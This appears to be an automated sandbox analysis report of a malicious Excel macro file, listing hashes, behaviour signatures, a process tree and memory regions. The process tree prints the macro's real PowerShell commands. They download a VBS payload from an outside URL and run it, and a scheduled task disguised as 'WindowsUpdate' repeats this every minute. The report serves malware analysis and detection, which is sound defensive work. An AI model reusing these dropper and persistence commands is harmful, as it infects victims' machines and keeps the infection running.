Analysis
-
max time kernel
148s -
max time network
178s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
30-11-2022 15:59
General
-
Target
852814dff1f5436f435dd07b6e85bed63108e584904fd63f2ac684e678ff54b5.xlsm
-
Size
24KB
-
MD5
2074b0a024bd3ac6f1b4d89dbabab077
-
SHA1
c28cc5109d94307c149501dd805cd95c4afb7d69
-
SHA256
852814dff1f5436f435dd07b6e85bed63108e584904fd63f2ac684e678ff54b5
-
SHA512
5ba5b174bc1b5f83fbf0e0e776a70d37dc1e6ce4ca3f9aa60dea1b732981b3a1daf80f75442cfaf5c4539ef3d6bcd205380665dd3b0496bfe689b981ff567d03
-
SSDEEP
768:qEIo2CBP+PD85eIAr/caeu+dCcd97mSHH9:qItfBdCemIH9
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://acorn-paper.com/components/com_content/models/bs/s.vbs
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://acorn-paper.com/components/com_content/models/bs/s.vbs
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 9 IoCs
-
Drops file in System32 directory 3 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\852814dff1f5436f435dd07b6e85bed63108e584904fd63f2ac684e678ff54b5.xlsm1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://acorn-paper.com/components/com_content/models/bs/s.vbs\\\",\\\"$env:public\svchost325.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost325.vbs\\\");" /F2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://acorn-paper.com/components/com_content/models/bs/s.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {C12CC569-E027-4C87-8EEA-3D680F78FCE0} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -W Hidden (New-Object System.Net.WebClient).DownloadFile(\"http://acorn-paper.com/components/com_content/models/bs/s.vbs\",\"$env:public\svchost325.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost325.vbs\");2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -W Hidden (New-Object System.Net.WebClient).DownloadFile(\"http://acorn-paper.com/components/com_content/models/bs/s.vbs\",\"$env:public\svchost325.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost325.vbs\");2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -W Hidden (New-Object System.Net.WebClient).DownloadFile(\"http://acorn-paper.com/components/com_content/models/bs/s.vbs\",\"$env:public\svchost325.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost325.vbs\");2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD559c7a317894f421c5dca53e4690c3c02
SHA1ccc5558765e0ca4971b1197099825b65a5ed9ec1
SHA2567c943da4b46f25753b8d1c66ca18a599fdf5c34abf963c84ec5c2905cb17e8bf
SHA51221c1860011078cc86561e2ab3978026958b854893a1cc3eb4c1fb96703d039b174e86d05b355fcc0027b3e2f7a2d4a9dcf6b489b2f303080b7634cf6739f5ecf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD559c7a317894f421c5dca53e4690c3c02
SHA1ccc5558765e0ca4971b1197099825b65a5ed9ec1
SHA2567c943da4b46f25753b8d1c66ca18a599fdf5c34abf963c84ec5c2905cb17e8bf
SHA51221c1860011078cc86561e2ab3978026958b854893a1cc3eb4c1fb96703d039b174e86d05b355fcc0027b3e2f7a2d4a9dcf6b489b2f303080b7634cf6739f5ecf
-
memory/616-75-0x000000000262B000-0x000000000264A000-memory.dmpFilesize
124KB
-
memory/616-67-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmpFilesize
8KB
-
memory/616-70-0x000007FEF3330000-0x000007FEF3E8D000-memory.dmpFilesize
11.4MB
-
memory/616-69-0x000007FEF3E90000-0x000007FEF48B3000-memory.dmpFilesize
10.1MB
-
memory/616-77-0x000000000262B000-0x000000000264A000-memory.dmpFilesize
124KB
-
memory/616-76-0x0000000002624000-0x0000000002627000-memory.dmpFilesize
12KB
-
memory/616-74-0x0000000002624000-0x0000000002627000-memory.dmpFilesize
12KB
-
memory/616-66-0x0000000000000000-mapping.dmp
-
memory/616-71-0x0000000002624000-0x0000000002627000-memory.dmpFilesize
12KB
-
memory/616-72-0x000000000262B000-0x000000000264A000-memory.dmpFilesize
124KB
-
memory/964-58-0x0000000074AB1000-0x0000000074AB3000-memory.dmpFilesize
8KB
-
memory/964-57-0x0000000071D0D000-0x0000000071D18000-memory.dmpFilesize
44KB
-
memory/964-65-0x0000000071D0D000-0x0000000071D18000-memory.dmpFilesize
44KB
-
memory/964-54-0x000000002F931000-0x000000002F934000-memory.dmpFilesize
12KB
-
memory/964-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/964-55-0x0000000070D21000-0x0000000070D23000-memory.dmpFilesize
8KB
-
memory/1140-61-0x0000000000000000-mapping.dmp
-
memory/1172-87-0x0000000000000000-mapping.dmp
-
memory/1172-91-0x000007FEF3330000-0x000007FEF3E8D000-memory.dmpFilesize
11.4MB
-
memory/1172-90-0x000007FEF3E90000-0x000007FEF48B3000-memory.dmpFilesize
10.1MB
-
memory/1172-92-0x0000000002234000-0x0000000002237000-memory.dmpFilesize
12KB
-
memory/1172-93-0x000000000223B000-0x000000000225A000-memory.dmpFilesize
124KB
-
memory/1668-82-0x000007FEF2990000-0x000007FEF34ED000-memory.dmpFilesize
11.4MB
-
memory/1668-83-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1668-84-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB
-
memory/1668-85-0x00000000024E4000-0x00000000024E7000-memory.dmpFilesize
12KB
-
memory/1668-86-0x00000000024EB000-0x000000000250A000-memory.dmpFilesize
124KB
-
memory/1668-81-0x000007FEF34F0000-0x000007FEF3F13000-memory.dmpFilesize
10.1MB
-
memory/1668-78-0x0000000000000000-mapping.dmp
-
memory/1912-73-0x000000006B810000-0x000000006BDBB000-memory.dmpFilesize
5.7MB
-
memory/1912-68-0x000000006B810000-0x000000006BDBB000-memory.dmpFilesize
5.7MB
-
memory/1912-64-0x000000006B810000-0x000000006BDBB000-memory.dmpFilesize
5.7MB
-
memory/1912-62-0x0000000000000000-mapping.dmp